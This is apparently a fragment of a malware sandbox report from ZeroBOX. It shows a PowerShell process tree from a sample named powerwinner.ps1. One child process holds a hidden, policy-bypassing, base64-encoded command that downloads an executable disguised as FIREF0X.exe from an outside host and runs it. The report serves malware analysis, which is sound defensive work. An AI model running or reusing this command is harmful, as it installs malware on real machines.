| ZeroBOX

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\powerwinner.ps1
1648
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypaSs -NoP -W HIdDen -EC IAAJAEkAbgBWAG8AawBFAC0AcgBlAFMAdABNAEUAdABIAG8ARAAgAAkALQBVAHIASQAgAAkAKAAdIGgAdAB0AHAAOgAvAC8AdABvAHIAbgBhAC4AeQBkAG4AcwAuAGUAdQAvAB0gIAAgACAAIAArACAAIAAdIG8AHSAgACAAIAAgACsAIAAgAB0gbgAvAGIAcwB2AC8AVwBiAGwAeABoAHUAYQBrAHMAHSAgACAAIAAgACsAIAAgAB0gdQBqAHYAHSAgACAAIAAgACsAIAAgAB0gaABxAC4AZQAdICAAIAAgACAAKwAgACAAHSB4AB0gIAAgACAAIAArACAAIAAdIGUAHSAgACAAKQAgACAALQBvAHUAVABGAGkAbABFACAAIAAdICQAZQBOAHYAOgB0AGUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0gIAA7ACAACQAmACAACQAdICQAZQBOAFYAOgB0AEUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0g
  2136

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis